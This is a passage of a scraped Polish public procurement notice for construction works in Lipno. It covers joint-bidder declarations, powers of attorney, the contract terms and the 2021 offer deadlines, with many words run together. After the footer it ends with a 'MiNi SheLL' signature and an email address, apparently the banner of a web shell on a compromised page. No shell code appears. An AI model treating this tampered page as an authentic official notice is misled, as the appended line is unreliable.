pełnomocnictwa nie możebyć poświadczone przez upełnomocnionego.5. Do oferty wykonawcy wspólnie ubiegający się ozamówienie zobowiązani są dołączyć, zgodnie z art. 117 ust. 4 ustawy PZP, oświadczeniewykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które robotybudowlane, dostawy lub usługi wykonają poszczególni wykonawcy zgodnie z Załącznikiem nr 3do SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofertoświadczenie o niepodleganiu wykluczeniu w zakresie wskazanym przez Zamawiającego –zgodnie z Załącznikiem nr 2 do SWZ. W w przypadku wspólnego ubiegania się o zamówienieprzez wykonawców, niniejsze oświadczenie składa każdy z wykonawców osobno;2. Do ofertywykonawcy wspólnie ubiegający się o zamówienie zobowiązani są dołączyć, zgodnie z art. 117ust. 4 ustawy PZP, oświadczenie wykonawców wspólnie ubiegających się o udzieleniezamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonająposzczególni wykonawcy zgodnie z Załącznikiem nr 3 do SWZ;3. W przypadku wspólnegoubiegania się wykonawców o zamówienie, Wykonawcy ustanawiają pełnomocnika doreprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawiezamówienia publicznego. Stosowne pełnomocnictwo należy załączyć do oferty tj.:w przypadkugdy Wykonawcę/-ów reprezentuje pełnomocnik, należy do oferty załączyć pełnomocnictwo doreprezentowania Wykonawcy/-ów określające jego zakres i podpisane przez osobyupoważnione do reprezentowania Wykonawcy/-ów. Pełnomocnictwo składa się w formieelektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się także złożenie cyfrowego odwzorowania pełnomocnictwa(sporządzonego uprzednio w postaci papierowej) opatrzonego kwalifikowanym podpisemelektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodnośćcyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodnościcyfrowego odwzorowania z pełnomocnictwem w postaci papierowej dokonuje mocodawca lubnotariusz (w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2ustawy z dnia 14 lutego 1991 r. - Prawo o notariacie, które to poświadczenie notariusz opatrujekwalifikowanym podpisem elektronicznym). Cyfrowe odwzorowanie pełnomocnictwa nie możebyć poświadczone przez upełnomocnionego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy zawarte są we "wzorze umowy" stanowiącym Załącznik nr 10 do SWZ dla Części nr 1 i załącznik nr 10a do SWZ dla Części nr 2 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">strona postępowania na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/lipno/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-21 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-19</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy tylko dla Części nr 1. Nie wymaga wniesienia zabezpieczenia należytego wykonania umowy dla Częścinr 2.2. Środki ochrony prawnej zostały przewidziane w Dziale IX ustawy PZP i przysługująwykonawcy, uczestnikowi konkursu oraz innemu podmiotowi, jeżeli ma lub miał interes wuzyskaniu zamówienia lub nagrody w konkursie oraz poniósł lub może ponieść szkodę w wynikunaruszenia przez zamawiającego przepisów ustawy PZP Środki ochrony prawnej wobecogłoszenia wszczynającego postępowanie o udzielenie zamówienia lub ogłoszenia o konkursieoraz dokumentów zamówienia przysługują również organizacjom wpisanym na listę, o którejmowa w art. 469 pkt 15 PZP oraz Rzecznikowi Małych i Średnich Przedsiębiorców</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-06 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com